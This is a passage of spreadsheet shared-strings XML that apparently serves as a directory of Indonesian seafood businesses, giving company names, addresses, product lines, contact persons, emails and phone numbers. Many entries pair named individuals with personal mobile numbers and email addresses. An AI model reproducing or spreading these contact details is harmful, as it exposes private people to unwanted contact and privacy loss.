    <t>Dusun Bengkal RT 04 RW 04, Kel. Tanjungsari, Kec. Pacitan, Kabupaten Pacitan</t>
  </si>
  <si>
    <t>Lainnya, Asap, Beku</t>
  </si>
  <si>
    <t>Sambal Tuna, Ikan Asap, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>RINA ARIFIANI</t>
  </si>
  <si>
    <t>navarbaharirayapt@gmail.com</t>
  </si>
  <si>
    <t>0853 3006 9829</t>
  </si>
  <si>
    <t>RINA ARIFIANI 0853 3006 9829</t>
  </si>
  <si>
    <t>POKLAHSAR BERKAH SAMUDRA</t>
  </si>
  <si>
    <t>DENI HERMANTO</t>
  </si>
  <si>
    <t>denihermanto02@gmail.com</t>
  </si>
  <si>
    <t>DENI HERMANTO / 081803377099</t>
  </si>
  <si>
    <t>CV. SINAR ABADI</t>
  </si>
  <si>
    <t>Dusun Morbeddih RT 002 RW 003, Kel. Panaguan, Kec. Larangan, Kabupaten Pamekasan</t>
  </si>
  <si>
    <t>Junaidi</t>
  </si>
  <si>
    <t>Larangan</t>
  </si>
  <si>
    <t>Panaguan</t>
  </si>
  <si>
    <t>sinarabadi_frozenfish@yahoo.com</t>
  </si>
  <si>
    <t>Junaidi &amp; 0811332222</t>
  </si>
  <si>
    <t>PT. SAMUDERA TIGA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Muara Baru  Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Daging Tuna Beku, Kerang Beku</t>
  </si>
  <si>
    <t>SUMARNO</t>
  </si>
  <si>
    <t>samuderatigasejahterasts@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">021-22672001 </t>
  </si>
  <si>
    <t>SALYA ADI NUGROHO 085394162480</t>
  </si>
  <si>
    <t>SATRIA ADLI HS</t>
  </si>
  <si>
    <t>UD. ZULFALIN</t>
  </si>
  <si>
    <t>PPI GOTO, Kel. Tomalou, Kec. Tidore Selatan, Kota Tidore Kepulauan</t>
  </si>
  <si>
    <t>Hajawia Ibrahim</t>
  </si>
  <si>
    <t>Tidore Selatan</t>
  </si>
  <si>
    <t>Tomalou</t>
  </si>
  <si>
    <t>hajawiaibrahim@gmail.com</t>
  </si>
  <si>
    <t>Hajawia Ibrahim +62821-2430-7103</t>
  </si>
  <si>
    <t>Anas Ibrahim</t>
  </si>
  <si>
    <t>CV. KARYA LAUT</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Gabion Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>SAHDAN dan Mollen Gultom</t>
  </si>
  <si>
    <t>karyalaut01@gmail.com</t>
  </si>
  <si>
    <t>Sahat H.V Manihuruk 081382217329</t>
  </si>
  <si>
    <t>SAHDAN</t>
  </si>
  <si>
    <t>CV. TIGA PUTERA THIRTA</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Keong Laut Hidup, Lobster Hidup, Udang Ronggeng Hidup, Kepiting Hidup, Belut Hidup, Kerapu Hidup</t>
  </si>
  <si>
    <t>irawan</t>
  </si>
  <si>
    <t>thirtatigaputra@gmail.com</t>
  </si>
  <si>
    <t>irawan 081236076887</t>
  </si>
  <si>
    <t>PT. ASIA MAKMUR REJEKI</t>
  </si>
  <si>
    <t>Jl. Juwana - Tayu RT 07 RW 03, Kel. Langgenharjo, Kec. Juwana, Kabupaten Pati</t>
  </si>
  <si>
    <t>SUWITO</t>
  </si>
  <si>
    <t>Langgenharjo</t>
  </si>
  <si>
    <t>amrejeki_jwn@yahoo.com</t>
  </si>
  <si>
    <t>0295-471579</t>
  </si>
  <si>
    <t>HERY TRI MOELYO 0823-1368-2375</t>
  </si>
  <si>
    <t>HERY TRI MOELYO</t>
  </si>
  <si>
    <t>CV. BARUNA SINAR ABADI</t>
  </si>
  <si>
    <t>Jl. A. Yani Km 47, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut</t>
  </si>
  <si>
    <t>FRENDY</t>
  </si>
  <si>
    <t>resirahayu23r@gmail.com</t>
  </si>
  <si>
    <t>CV. ADHYATAMA PRAKARSA (PEMPEK CEK MOLEK)</t>
  </si>
  <si>
    <t>Jl. Kapten A Rivai No.63A, Kel. 26 Ilir, Kec. Bukit Kecil, Kota Palembang</t>
  </si>
  <si>
    <t>Yenny Anggraini</t>
  </si>
  <si>
    <t>Bukit Kecil</t>
  </si>
  <si>
    <t>26 Ilir</t>
  </si>
  <si>
    <t>yenny.anggrainicm@gmail.com</t>
  </si>
  <si>
    <t>Yenny Anggraini / 08127120033</t>
  </si>
  <si>
    <t>CV. TIGA A</t>
  </si>
  <si>
    <t>Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Rajungan Segar, Udang Segar, Kepiting Hidup, Belut Hidup</t>
  </si>
  <si>
    <t>SUMARYONO</t>
  </si>
  <si>
    <t>Gambut</t>
  </si>
  <si>
    <t>Kayu Bawang</t>
  </si>
  <si>
    <t>damanhuri222@gmail.com</t>
  </si>
  <si>
    <t>0511-6747238</t>
  </si>
  <si>
    <t>Daman Huri &amp; 0812503</t>
  </si>
  <si>
    <t>DAMAN HURI</t>
  </si>
  <si>
    <t>UD. BUNDA FOODS</t>
  </si>
  <si>
    <t>RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Fermentasi, Lainnya, Beku, Asap, Kering</t>
  </si>
  <si>
    <t>Terasi Udang, Ikan Bakar, Bandeng Tanpa Duri, Bandeng Asap, Kerang Kupang Krispy, Abon Ikan, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>LITA EKA YUFIDAH, AMd.</t>
  </si>
  <si>
    <t>Penatarsewu</t>
  </si>
  <si>
    <t>ukmbundafoods@gmail.com</t>
  </si>
  <si>
    <t>LITA EKA YUFIDAH, AMd.  0813 3663 8594</t>
  </si>
  <si>
    <t>POKLAHSAR SEJAHTERA</t>
  </si>
  <si>
    <t>Kampung Cikujang RT 005 RW 004, Kel. Maruyung, Kec. Pacet, Kabupaten Bandung</t>
  </si>
  <si>
    <t>H. Ubedillah</t>
  </si>
  <si>
    <t>Pacet</t>
  </si>
  <si>
    <t>Maruyung</t>
  </si>
  <si>
    <t>poklahsarsejahtera@gmail.com</t>
  </si>
  <si>
    <t>KOPERASI ACEH FOOD FISH JELLY</t>
  </si>
  <si>
    <t>Jl. Rama Setia No.49, Kel. Lampaseh Aceh, Kec. Meuraxa, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Cut Sri Haswirna</t>
  </si>
  <si>
    <t>Meuraxa</t>
  </si>
  <si>
    <t>Lampaseh Aceh</t>
  </si>
  <si>
    <t>koperasiacehfoodfishjelly@gmail.com</t>
  </si>
  <si>
    <t>Khairul Ikhsan 081275626981</t>
  </si>
  <si>
    <t>Khairul Ikhsan</t>
  </si>
  <si>
    <t>UD. BAN DOKAR</t>
  </si>
  <si>
    <t>Dusun Karang Pakis RT 016 RW 005, Kel. Dukuhsari, Kec. Jabon, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>SITI MURDI‚ÄôAH</t>
  </si>
  <si>
    <t>Jabon</t>
  </si>
  <si>
    <t>Dukuhsari</t>
  </si>
  <si>
    <t>ukmbandokar@gmail.com</t>
  </si>
  <si>
    <t>0822 5733 0132</t>
  </si>
  <si>
    <t>SITI MURDI‚ÄôAH  0822 5733 0132</t>
  </si>
  <si>
    <t>Jl. Krekot Bunder XI/11A, Kel. Pasar Baru, Kec. Sawah Besar, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Ubur-Ubur Kering</t>
  </si>
  <si>
    <t>Sawah Besar</t>
  </si>
  <si>
    <t>Pasar Baru</t>
  </si>
  <si>
    <t>pipit_exp_mhr@yahoo.com</t>
  </si>
  <si>
    <t>021-3841289</t>
  </si>
  <si>
    <t>08129432961/081298131735</t>
  </si>
  <si>
    <t>PEMPEK SYAMIL</t>
  </si>
  <si>
    <t>Jl. KH. Wahid Hasyim Lorong Damai No.488 B, Kel. 7 Ulu, Kec. Seberang Ulu 1, Kota Palembang</t>
  </si>
  <si>
    <t>Kartini eka sari</t>
  </si>
  <si>
    <t>Seberang Ulu 1</t>
  </si>
  <si>
    <t>7 Ulu</t>
  </si>
  <si>
    <t>kartinisari1313@gmail.com</t>
  </si>
  <si>
    <t>PT. MATSYA JAYA SHAKTI</t>
  </si>
  <si>
    <t>Jl. Peternakan II No.24-B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Hiu Asin Kering, Ikan Pelagis Asin Kering</t>
  </si>
  <si>
    <t>MOHANDAS</t>
  </si>
  <si>
    <t>matsyajshakti@gmail.com</t>
  </si>
  <si>
    <t>MOHANDAS - 081314652351</t>
  </si>
  <si>
    <t>PT. SUMBER NELAYAN SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Barat No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Darvin Jimmytat S</t>
  </si>
  <si>
    <t>wahyuwcs88@gmail.com</t>
  </si>
  <si>
    <t>Jonny / 081228556686</t>
  </si>
  <si>
    <t>ics2020@gmail.com</t>
  </si>
  <si>
    <t>I GADE MAHA GUNADA / 08124464481</t>
  </si>
  <si>
    <t>I GADE MAHA GUNADA</t>
  </si>
  <si>
    <t>CV. SAMA JAYA</t>
  </si>
  <si>
    <t>Komplek Margomulyo Indah 27A No.1, Kel. Balongsari, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>LIE ALFIANTO LUAYA</t>
  </si>
  <si>
    <t>cv.sanajaya@gmail.com</t>
  </si>
  <si>
    <t>PT. ELSON BERNARDI</t>
  </si>
  <si>
    <t>Jl. Raya Surabaya - Malang KM 40, Kel. Ngerong, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Siomay Ikan</t>
  </si>
  <si>
    <t>IVAN BERNARDI</t>
  </si>
  <si>
    <t>Ngerong</t>
  </si>
  <si>
    <t>mail@elsonbernardi.co.id</t>
  </si>
  <si>
    <t>LAILATUL ROCHMA &amp; 081555881118</t>
  </si>
  <si>
    <t>KUSRIYANTO MANTEUS</t>
  </si>
  <si>
    <t>ABI CULINARY</t>
  </si>
  <si>
    <t>Dusun Jarakan RT 23 RW 05, Kel. Karangsoko, Kec. Trenggalek, Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>Abon Ikan, Kerupuk Ikan</t>
  </si>
  <si>
    <t>Dedi Arifiyanto</t>
  </si>
  <si>
    <t>Trenggalek</t>
  </si>
  <si>
    <t>Karangsoko</t>
  </si>
  <si>
    <t>muthiaded@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Sri Utami Dewi 085232621312 </t>
  </si>
  <si>
    <t>PT. RIYOUSA CIPTA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Daeng Tata Raya, Ruko Permata Mutiara Blok A 26-28, Kel. Parang Tambung, Kec. Tamalate, Kota Makassar</t>
  </si>
  <si>
    <t>Muhammad Syarif</t>
  </si>
  <si>
    <t>Parang Tambung</t>
  </si>
  <si>
    <t>irwansyahbachmid@gmail.com</t>
  </si>
  <si>
    <t>+62 822-8228-2078</t>
  </si>
  <si>
    <t>Muhammad Syarif +62 822-8228-2078</t>
  </si>
  <si>
    <t>YAMOIS INDO PRIMA</t>
  </si>
  <si>
    <t>Jl. Kemayoran Atas 8 AQ 18-19 RT 03 RW 09, Kel. Cemorokandang, Kec. Kedungkandang, Kota Malang</t>
  </si>
  <si>
    <t>HANNY ANISA, S. Psi</t>
  </si>
  <si>
    <t>Kedungkandang</t>
  </si>
  <si>
    <t>Cemorokandang</t>
  </si>
  <si>
    <t>yamoisngalam@gmail.com</t>
  </si>
  <si>
    <t>YASINTA INNA S  081233804620</t>
  </si>
  <si>
    <t>YASINTA INNA S</t>
  </si>
  <si>
    <t>CV. ETERNAL STARS OCEAN</t>
  </si>
  <si>
    <t>Jl. Udang Blok M Kav No.7 Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Salmon Beku, Cephalopoda Beku, Ikan Pelagis Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>M. SONI MARZUKI</t>
  </si>
  <si>
    <t>eternalstarsocean@gmail.com</t>
  </si>
  <si>
    <t>Suci 089669810323</t>
  </si>
  <si>
    <t>PT. LAPPAWALA MANDIRI PERBATASAN</t>
  </si>
  <si>
    <t>Jl. Jamaker RT 05, Kel. Nunukan Timur, Kec. Nunukan, Kabupaten Nunukan</t>
  </si>
  <si>
    <t xml:space="preserve">A.ZULKIFLI GUNTUR </t>
  </si>
  <si>
    <t>Nunukan Timur</t>
  </si>
  <si>
    <t>ptlappawalamandiriperbatasan@gmail.com</t>
  </si>
  <si>
    <t>UD. ARYANTO</t>
  </si>
  <si>
    <t>Jl. Abu Hanifah No.23, Kel. Tengah Padang, Kec. Teluk Segara, Kota Bengkulu</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Campuran Seafood Beku</t>
  </si>
  <si>
    <t>Aryanto</t>
  </si>
  <si>
    <t>Tengah Padang</t>
  </si>
  <si>
    <t>aryantoskp@gmail.com</t>
  </si>
  <si>
    <t>Aryanto/085378913434</t>
  </si>
  <si>
    <t>PT. THT MAJU INDONESIA</t>
  </si>
  <si>
    <t>Kawasan Industri Agroforestry Terpadu (KIAT), Jl. Raya Tlogowungu Lahar, Kel. Regaloh, Kec. Tlogowungu, Kabupaten Pati</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Kulit Ikan Pari, Teripang Kering, Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>Tian Muzhang</t>
  </si>
  <si>
    <t>Tlogowungu</t>
  </si>
  <si>
    <t>Regaloh</t>
  </si>
  <si>
    <t>thtmajuindonesia@gmail.com</t>
  </si>
  <si>
    <t>082242888539, 081312938888</t>
  </si>
  <si>
    <t>Kamal, 081395438183</t>
  </si>
  <si>
    <t>Hilda Ayu Mayangsari</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Salmon Beku, Salmon Segar, Cephalopoda Beku, Lobster Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>akoeh0101@gmail.com</t>
  </si>
  <si>
    <t>JUARD EFFENDI</t>
  </si>
  <si>
    <t>CV. ALGA MARINA SUKSES</t>
  </si>
  <si>
    <t>Ir. Sutami No.107, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Johan Philipus</t>
  </si>
  <si>
    <t>algamarinasukses@gmail.com</t>
  </si>
  <si>
    <t>CV. FIVA FOOD &amp; MEAT SUPPLY</t>
  </si>
  <si>
    <t>Jl. Al Ikhsan, Kp Kemang No.104, Kel. Jatibening Baru, Kec. Pondok Gede, Kota Bekasi</t>
  </si>
  <si>
    <t>Betsy Monoarfa</t>
  </si>
  <si>
    <t>Pondok Gede</t>
  </si>
  <si>
    <t>Jatibening Baru</t>
  </si>
  <si>
    <t>fivafood@yahoo.com</t>
  </si>
  <si>
    <t>021 8484308</t>
  </si>
  <si>
    <t>Mutia Fadillah 085717958591</t>
  </si>
  <si>
    <t>Mutia Fadillah</t>
  </si>
  <si>
    <t>Jl. Raya Narogong KM 12,5 Pangkalan 5 No. 7, Kel. Bantar Gebang, Kec. Ciwikul, Kota Bekasi</t>
  </si>
  <si>
    <t>Ciwikul</t>
  </si>
  <si>
    <t>qa.staff02@pbn.co.id</t>
  </si>
  <si>
    <t>Endang Rosiana / 081281201030</t>
  </si>
  <si>
    <t>PT. DHARMA SAMUDERA FISHING INDUSTIRES</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No. 39, Kel. Kendari Caddi, Kec. Kendari, Kota Kendari</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>ARYO ALI SUPRAPTO</t>
  </si>
  <si>
    <t>Kendari</t>
  </si>
  <si>
    <t>Kendari Caddi</t>
  </si>
  <si>
    <t>stockdsfikdi@gmail.com</t>
  </si>
  <si>
    <t>MAWAR ZAINUDDIN/081245852741</t>
  </si>
  <si>
    <t>TAMBAT AZWAN</t>
  </si>
  <si>
    <t>HOME INDUSTRI MILKFISH NEW ISTICHOMAH</t>
  </si>
  <si>
    <t>Jl. Dworowati Raya No.29B, Kel. Krobokan, Kec. Semarang Barat, Kota Semarang</t>
  </si>
  <si>
    <t>Bandeng Presto</t>
  </si>
  <si>
    <t>Petrus Sugiyanto</t>
  </si>
  <si>
    <t>Semarang Barat</t>
  </si>
  <si>
    <t>Krobokan</t>
  </si>
  <si>
    <t>bandeng_petrus@yahoo.co.id</t>
  </si>
  <si>
    <t>Petrus Sugiyanto &amp; 082134617465</t>
  </si>
  <si>
    <t>PT. ABADI MAKMUR OCEAN</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No. 3, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>RUSIA</t>
  </si>
  <si>
    <t>abadimakmurocean1@gmail.com</t>
  </si>
  <si>
    <t>0401-3195607</t>
  </si>
  <si>
    <t>RUSIA - 0821-9254-8888</t>
  </si>
  <si>
    <t>CV. LAUTAN BERKAT FOOD</t>
  </si>
  <si>
    <t>Jl. Industri Bajomulya Ujung, Kel. Growong Lor, Kec. Juwana, Kabupaten Pati</t>
  </si>
  <si>
    <t>SIE MARTIN IMMANUEL AGUSTA</t>
  </si>
  <si>
    <t>Growong Lor</t>
  </si>
  <si>
    <t>lautanberkatfood@gmail.com</t>
  </si>
  <si>
    <t>SIE MARTIN IMMANUEL AGUSTA 082245551991</t>
  </si>
  <si>
    <t>RAFIN'S</t>
  </si>
  <si>
    <t>Jl. Jendral Sudirman No.2 RT 03 RW 03, Kel. Fajaresuk, Kec. Pringsewu, Kabupaten Pringsewu</t>
  </si>
  <si>
    <t>Keripik Kulit Ikan, Abon Patin</t>
  </si>
  <si>
    <t>muhammad ansor</t>
  </si>
  <si>
    <t>Pringsewu</t>
  </si>
  <si>
    <t>Fajaresuk</t>
  </si>
  <si>
    <t>rospawati99@gmail.com</t>
  </si>
  <si>
    <t>rospawati</t>
  </si>
  <si>
    <t>PT. EXCLUSIVE PANCA ANUGRAH</t>
  </si>
  <si>
    <t>Jl. Jendral Ahmad Yani Km 14 RT 08 RW 03, Kel. Sepancar Lawang Kulon, Kec. Baturaja Timur, Kabupaten Ogan Komering Ulu</t>
  </si>
  <si>
    <t>Shinta Roilan</t>
  </si>
  <si>
    <t>Baturaja Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Sepancar Lawang Kulon </t>
  </si>
  <si>
    <t>ptexclusivepancaanugrah@gmail.com</t>
  </si>
  <si>
    <t>0711-322251, 08117871548</t>
  </si>
  <si>
    <t>Shinta Roilan 08117871548</t>
  </si>
  <si>
    <t>PT. SAFARI SETIA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Pembangunan 2 No.33 RT 001 RW 001, Kel. Batu Sari, Kec. Batu Ceper, Kota Tangerang</t>
  </si>
  <si>
    <t>Daging Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Jhonny Hutahaean </t>
  </si>
  <si>
    <t xml:space="preserve">Batu Ceper </t>
  </si>
  <si>
    <t xml:space="preserve">Batu Sari </t>
  </si>
  <si>
    <t>safarisetiaindonesia@gmail.com</t>
  </si>
  <si>
    <t>021-87720248</t>
  </si>
  <si>
    <t>Wimpy Natanael 081282573578</t>
  </si>
  <si>
    <t>Erikson Rajamulana Simatupang</t>
  </si>
  <si>
    <t>Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Cephalopoda Segar, Cephalopoda Beku, Tuna Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Bacan Timur</t>
  </si>
  <si>
    <t>Babang</t>
  </si>
  <si>
    <t>lautan_bacan@yahoo.com</t>
  </si>
  <si>
    <t>Ratna 081386633964</t>
  </si>
  <si>
    <t>TARUNA MINA FOOD</t>
  </si>
  <si>
    <t>Jl. Cimaburan No.23, Kp. Kelapatujuh RT 04 RW 07, Kel. Sukawening, Kec. Dramaga, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Ikan Krispy, Udang Krispy, Kulit Patin Krispy</t>
  </si>
  <si>
    <t>Wiko Puji Susanto</t>
  </si>
  <si>
    <t>Dramaga</t>
  </si>
  <si>
    <t>Sukawening</t>
  </si>
  <si>
    <t>tarunaminafood@gmail.com</t>
  </si>
  <si>
    <t>Wiko (085217717191)</t>
  </si>
  <si>
    <t>PT. ASIA SEJAHTERA MINA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.24 Kawasan Logistik Terpadu Blok A1, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>INDRA WIDYADHARMA</t>
  </si>
  <si>
    <t>ptasm.mks2@gmail.com</t>
  </si>
  <si>
    <t>NELSON TANRI</t>
  </si>
  <si>
    <t>CV. WAHANA SEJAHTERA FOODS</t>
  </si>
  <si>
    <t>Jl. Sumojoyo Prawiro No.132 RT 002 RW 002, Kel. Mojokrapak, Kec. Tembelang, Kabupaten Jombang</t>
  </si>
  <si>
    <t>Fillet Patin Beku</t>
  </si>
  <si>
    <t>AGUNG WICAKSONO</t>
  </si>
  <si>
    <t>Tembelang</t>
  </si>
  <si>
    <t>Mojokrapak</t>
  </si>
  <si>
    <t>aseptianindra08@gmail.com</t>
  </si>
  <si>
    <t>Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Kerang Beku, Ikan Demesal Beku, Ikan Pelagis Beku, Daging Tuna Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>Happy Simanjuntak, S.H.,M.H.</t>
  </si>
  <si>
    <t>pt.majumina@gmail.com</t>
  </si>
  <si>
    <t>KOPERASI PRODUKSI GENERASI MANDIRI</t>
  </si>
  <si>
    <t>Jl. Delima Dusun Setia Kawan, Kel. Teluk Pambang, Kec. Bantan, Kabupaten Bengkalis</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>M. MUZAMIL</t>
  </si>
  <si>
    <t>Teluk Pambang</t>
  </si>
  <si>
    <t>koperasi.generasimandiri@gmail.com</t>
  </si>
  <si>
    <t>DEDI ARIANTO</t>
  </si>
  <si>
    <t>CV. FARIS INDO SEAFOOD</t>
  </si>
  <si>
    <t>Pattene Business Park Blok K No.2, Kel. Pattene, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Loin Segar</t>
  </si>
  <si>
    <t>Sahrul Ramadan Harahap</t>
  </si>
  <si>
    <t>Pattene</t>
  </si>
  <si>
    <t>maguronesiagemilangsejahtera@gmail.com</t>
  </si>
  <si>
    <t>Ani 0822-9654-9667</t>
  </si>
  <si>
    <t>PT. UTAMAKAN KEMAKMURAN RAKYAT</t>
  </si>
  <si>
    <t>Dusun Sentosa, Kel. Lekopancing, Kec. Tanralili, Kabupaten Maros</t>
  </si>
  <si>
    <t>Bandeng Segar, Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar</t>
  </si>
  <si>
    <t>RUDY SUTANTO</t>
  </si>
  <si>
    <t>Tanralili</t>
  </si>
  <si>
    <t>Lekopancing</t>
  </si>
  <si>
    <t>utamakemakmuran@gmail.com</t>
  </si>
  <si>
    <t>0411-473 1571</t>
  </si>
  <si>
    <t>Riswan Sugisto (0853-9752-8699)</t>
  </si>
  <si>
    <t>PT. HANLA WASHING</t>
  </si>
  <si>
    <t>Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Demersal Bernilai Tambah Beku, Ikan Pelagis Bernilai Tambah Beku, Cephalopoda Beku, Udang Beku, Udang Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>CHANG IN SUK</t>
  </si>
  <si>
    <t>arachmadbidho@yahoo.co.id</t>
  </si>
  <si>
    <t>0248-660437</t>
  </si>
  <si>
    <t>RACHMAD 082314009442</t>
  </si>
  <si>
    <t>RACHMAD BIDHO AWALUDIN</t>
  </si>
  <si>
    <t>CV. KALDERA INTERNATIONAL TRADE</t>
  </si>
  <si>
    <t>Jl. Cabe V No. 52 A, Kel. Pondok Cabe, Kec. Pamulang , Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Anwar Tanuhadi</t>
  </si>
  <si>
    <t xml:space="preserve">Pamulang </t>
  </si>
  <si>
    <t>Pondok Cabe</t>
  </si>
  <si>
    <t>cvkalderainternationaltrade@gmail.com</t>
  </si>
  <si>
    <t>Rahmawati</t>
  </si>
  <si>
    <t>PD. BARUNA NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Sohiri, Kel. Tuada, Kec. Jailolo, Kabupaten Halmahera Barat</t>
  </si>
  <si>
    <t>Hariyono</t>
  </si>
  <si>
    <t>Jailolo</t>
  </si>
  <si>
    <t>Tuada</t>
  </si>
  <si>
    <t>yanti.lumaela@gmail.com</t>
  </si>
  <si>
    <t>Yanti &amp; 082292809491</t>
  </si>
  <si>
    <t>CV. TUNA LESTARI</t>
  </si>
  <si>
    <t>Jl. Gunung Tilongkabila, Kel. Biawu, Kec. Kota Selatan, Kota Gorontalo</t>
  </si>
  <si>
    <t>DEDY AHMAD</t>
  </si>
  <si>
    <t>Kota Selatan</t>
  </si>
  <si>
    <t>Biawu</t>
  </si>
  <si>
    <t>cv.tunalestari21@gmail.com</t>
  </si>
  <si>
    <t>Jl. Raya Lingkar Timur Komplek Pergudangan Platinum No.5A, Kel. Siwalanpanji, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Siwalanpanji</t>
  </si>
  <si>
    <t>UD. HIGHLANDER CONVERTION</t>
  </si>
  <si>
    <t>Dusun Ombe Rerot, Kel. Ombe Baru, Kec. Kediri, Kabupaten Lombok Barat</t>
  </si>
  <si>
    <t>Daging Rajungan Rebus Dingin, Cephalopoda Segar, Tuna Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Timbul Karyadi</t>
  </si>
  <si>
    <t>Ombe Baru</t>
  </si>
  <si>
    <t>tkaryadna@gmail.com</t>
  </si>
  <si>
    <t>Timbul Karyadi / 081336511033</t>
  </si>
  <si>
    <t>CV. ALAM SEMESTA HASILINDO</t>
  </si>
  <si>
    <t>Jl. Kepiting, Kel. Dufa-Dufa, Kec. Ternate Utara, Kota Ternate</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Pelagis Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>ADWI WAHYUNI</t>
  </si>
  <si>
    <t>Ternate Utara</t>
  </si>
  <si>
    <t>Dufa-Dufa</t>
  </si>
  <si>
    <t>adwi_wahyuni@yahoo.co.id</t>
  </si>
  <si>
    <t>ARIM 081240850606</t>
  </si>
  <si>
    <t>ARIM</t>
  </si>
  <si>
    <t>CV. SIMPUL AGRO GLOBALINDO</t>
  </si>
  <si>
    <t>Jl. Pattene Komp. Pergudangan Pattene Business Park Blok B/C No.11, Kel. Pabentengang, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Mursalim</t>
  </si>
  <si>
    <t>Pabentengang</t>
  </si>
  <si>
    <t>andisuryadi03@gmail.com</t>
  </si>
  <si>
    <t>Andi Suryadi 085255668998</t>
  </si>
  <si>
    <t>Andi Suryadi</t>
  </si>
  <si>
    <t>PT. SUKSES CITRA PANGAN</t>
  </si>
  <si>
    <t>Jl. Mayjen Sutoyo No.124, Kel. Kemalaraja, Kec. Baturaja Timur, Kabupaten Ogan Komering Ulu</t>
  </si>
  <si>
    <t>Noviyanti</t>
  </si>
  <si>
    <t>Kemalaraja</t>
  </si>
  <si>
    <t>ptsuksescitrapangan@gmail.com</t>
  </si>
  <si>
    <t>Noviyanti 081271034698</t>
  </si>
  <si>
    <t>Jl. Industri No.29 A, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>qanqc.gmcpsda@gmail.com</t>
  </si>
  <si>
    <t>031-8961062</t>
  </si>
  <si>
    <t>Samsul Huda / 08121702652</t>
  </si>
  <si>
    <t>Kasmiati</t>
  </si>
  <si>
    <t>CV. INTI YUDA SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Pramuka No.27B, Kel. Cibinong, Kec. Gunung Sindur, Kabupaten Bogor</t>
  </si>
  <si>
